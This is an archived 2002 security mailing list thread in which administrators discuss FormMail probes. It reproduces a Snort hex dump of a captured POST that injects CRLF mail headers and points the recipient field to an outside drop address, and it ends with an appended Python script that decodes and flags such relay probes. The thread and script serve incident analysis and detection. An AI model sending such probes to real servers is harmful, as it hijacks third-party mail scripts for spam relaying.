From: sunzi (sunzi_at_mod-x.co.uk)
Date: Thu Sep 05 2002 - 11:58:19 CDT
I've been seeing these on my production network for almost 2 months now ...
very annoying on my IIS Server with no Perl <g> I've seen 3 different scripts
so far. 1 is very basic, only placing the site name in the message in plain
text. The one you have I've also seen and the encoded text is a very
detailed reporting of the found formmail script (which is why I say it's a
different one). The last one I've seen so far is one referring to VOID
realname= (looks script kiddie proofed ;). I'll dig up some traces for
correlation.
cheers,
sunzi
----- Original Message -----
From: "Russell Fulton" <r.fulton@auckland.ac.nz>
To: <incidents@securityfocus.com>
Sent: Wednesday, September 04, 2002 10:23 PM
Subject: new type of formmail probes
> Hi All,
> Over the last week or so snort has been picking up many probes like
> this:
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> [**] WEB-CGI formmail arbitrary command execution attempt [**]
> 09/05-01:24:57.641599 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x30F
> 62.49.117.114:2645 -> 130.216.35.105:80 TCP TTL:107 TOS:0x0 ID:20226 IpLen:20 DgmLen:769 DF
> ***AP*** Seq: 0x350A6D63 Ack: 0x5BFB5778 Win: 0x2238 TcpLen: 20
> 50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo
> 72 6D 6D 61 69 6C 2E 70 6C 20 48 54 54 50 2F 31 rmmail.pl HTTP/1
> 2E 30 0D 0A 56 69 61 3A 20 31 2E 30 20 53 45 52 .0..Via: 1.0 SER
> 56 45 52 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A VER..Connection:
> 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E Keep-Alive..Con
> 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 30 32 tent-Length: 402
> 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo
> 7A 69 6C 6C 61 2F 34 2E 30 36 20 28 57 69 6E 39 zilla/4.06 (Win9
> 35 3B 20 49 29 0D 0A 43 6F 6E 74 65 6E 74 2D 54 5; I)..Content-T
> 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application
> 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 /x-www-form-urle
> 6E 63 6F 64 65 64 0D 0A 48 6F 73 74 3A 20 77 77 ncoded..Host: ww
> 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
> 2E 6E 7A 0D 0A 41 63 63 65 70 74 3A 20 69 6D 61 .nz..Accept: ima
> 67 65 2F 67 69 66 2C 20 69 6D 61 67 65 2F 78 2D ge/gif, image/x-
> 78 62 69 74 6D 61 70 2C 20 69 6D 61 67 65 2F 6A xbitmap, image/j
> 70 65 67 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E peg, application
> 2F 6D 73 77 6F 72 64 2C 20 2A 2F 2A 0D 0A 52 65 /msword, */*..Re
> 66 65 72 65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 ferer: http://ww
> 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac
> 2E 6E 7A 0D 0A 0D 0A 65 6D 61 69 6C 3D 64 61 61 .nz....email=daa
> 31 38 40 66 64 6A 31 30 2E 63 6F 6D 26 72 65 63 18@fdj10.com&rec
> 69 70 69 65 6E 74 3D 3C 69 69 6B 65 73 74 79 78 ipient=<iikestyx
> 40 61 6F 6C 2E 63 6F 6D 3E 77 77 77 2E 63 73 2E @aol.com>www.cs.
> 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 26 73 auckland.ac.nz&s
> 75 62 6A 65 63 74 3D 77 77 77 2E 63 73 2E 61 75 ubject=www.cs.au
> 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 25 32 46 63 ckland.ac.nz%2Fc
> 67 69 2D 62 69 6E 25 32 46 66 6F 72 6D 6D 61 69 gi-bin%2Fformmai
> 6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25 32 30 l.pl%20%20%20%20
> 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 %20%20%20%20%20%
> 32 30 25 32 30 25 32 30 25 32 30 25 32 30 6F 78 20%20%20%20%20ox
> 79 35 32 26 3D 25 30 44 25 30 41 25 30 44 25 30 y52&=%0D%0A%0D%0
> 41 74 69 6D 65 25 32 46 64 61 74 65 25 33 41 25 Atime%2Fdate%3A%
> 32 30 30 38 25 33 41 32 30 25 33 41 31 39 70 6D 2008%3A20%3A19pm
> 25 32 30 25 32 46 25 32 30 30 39 25 32 46 30 34 %20%2F%2009%2F04
> 25 32 46 32 30 30 32 25 30 44 25 30 41 3C 41 25 %2F2002%0D%0A<A%
> 32 30 48 52 45 46 25 33 44 25 32 32 77 77 77 2E 20HREF%3D%22www.
> 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E cs.auckland.ac.n
> 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 6F z%2Fcgi-bin%2Ffo
> 72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 77 77 77 rmmail.pl%22>www
> 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E .cs.auckland.ac.
> 6E 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 nz%2Fcgi-bin%2Ff
> 6F 72 6D 6D 61 69 6C 2E 70 6C 3C 25 32 46 41 3E ormmail.pl<%2FA>
> 25 30 44 25 30 41 25 30 44 25 30 41 25 30 44 25 %0D%0A%0D%0A%0D%
> 30 41 25 30 44 25 30 41 25 30 44 25 30 41 25 30 0A%0D%0A%0D%0A%0
> 44 25 30 41 6F 78 79 35 32 D%0Aoxy52
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
>
> Am I right in assuming that this is just more spammers looking for places
> to launder mail, or is it more sinister than that? I.e. do we believe
> the 'arbitrary command execution attempt' bit?
>
> Cheers, Russell.
>
> --
> Russell Fulton, Computer and Network Security Officer
> The University of Auckland, New Zealand
>
> "It ain't necessarily so" - Gershwin
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
----------------------------------------------------------------------------
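The POST body in the snort dump above is what an analyst has to decode to answer Russell's question. As an added example (not code from the list or from either poster), the Python below URL-decodes a FormMail POST body and flags the three features visible in the captured probe: an angle-bracketed outside address in `recipient` padded with the local hostname, CRLF sequences inside a field (mail-header injection), and the script's own URL echoed in the subject, which is what makes the test mail a report of a working script. `SAMPLE_BODY`, the placeholder addresses and the `www.victim.example` hostname, and the function names are assumptions made for this example; the body mirrors the layout of the captured one but none of its real values.

```python
"""Triage a captured FormMail POST body (added example, not from the thread)."""
import re
from urllib.parse import parse_qsl

# Constructed sample: same field layout as the captured probe, placeholder values.
SAMPLE_BODY = (
    "email=daa18@example.net"
    "&recipient=<drop@example.org>www.victim.example"
    "&subject=www.victim.example%2Fcgi-bin%2Fformmail.pl%20%20%20%20oxy52"
    "&=%0D%0A%0D%0Atime%2Fdate%3A%2008%3A20%3A19pm%0D%0A"
    "<A%20HREF%3D%22www.victim.example%2Fcgi-bin%2Fformmail.pl%22>"
    "www.victim.example%2Fcgi-bin%2Fformmail.pl<%2FA>%0D%0A%0D%0Aoxy52"
)

# An address wrapped in angle brackets, e.g. "<drop@example.org>".
BRACKETED_ADDR = re.compile(r"<([^<>\s]+@[^<>\s]+)>")


def decode_form(body):
    """URL-decode an application/x-www-form-urlencoded body into a dict.

    keep_blank_values=True also keeps the nameless '&=...' field the probe
    uses to carry its message text.
    """
    return dict(parse_qsl(body, keep_blank_values=True))


def triage_formmail_post(body, local_hosts):
    """Classify one POST body against a list of hostnames the server answers to.

    Returns {"verdict": ..., "findings": [...], "drop_addresses": [...]}.
    """
    fields = decode_form(body)
    findings = []
    drops = []

    # recipient: an outside address in angle brackets followed by one of our
    # own hostnames. The MTA delivers to the bracketed address; the trailing
    # hostname is only there to satisfy a domain check on the field.
    recipient = fields.get("recipient", "")
    for m in BRACKETED_ADDR.finditer(recipient):
        drops.append(m.group(1))
    tail = BRACKETED_ADDR.sub("", recipient).strip()
    if drops and any(h in tail for h in local_hosts):
        findings.append("recipient: bracketed outside address padded with local hostname")

    # CRLF inside any field is the marker for mail-header injection.
    for name, value in fields.items():
        if "\r\n" in value:
            findings.append(f"field {name!r}: contains CRLF")

    # A subject carrying the script's own path turns the test mail into a
    # report that the script at this URL relays mail.
    if "formmail.pl" in fields.get("subject", "").lower():
        findings.append("subject: echoes the formmail script path")

    verdict = "relay-probe" if any(f.startswith("recipient:") for f in findings) else "formmail-request"
    return {"verdict": verdict, "findings": findings, "drop_addresses": drops}


if __name__ == "__main__":
    result = triage_formmail_post(SAMPLE_BODY, ["www.victim.example"])
    print(result["verdict"])
    for f in result["findings"]:
        print(" -", f)
    print("drop addresses:", result["drop_addresses"])
```

Rebuild the body from the hex column of the snort dump rather than the ASCII column (snort prints CR and LF as dots), and pass in every hostname the server answers to, since the padding in `recipient` uses whichever one the probe found. A plain form post with a single local recipient and no CRLF produces no findings and the `formmail-request` verdict.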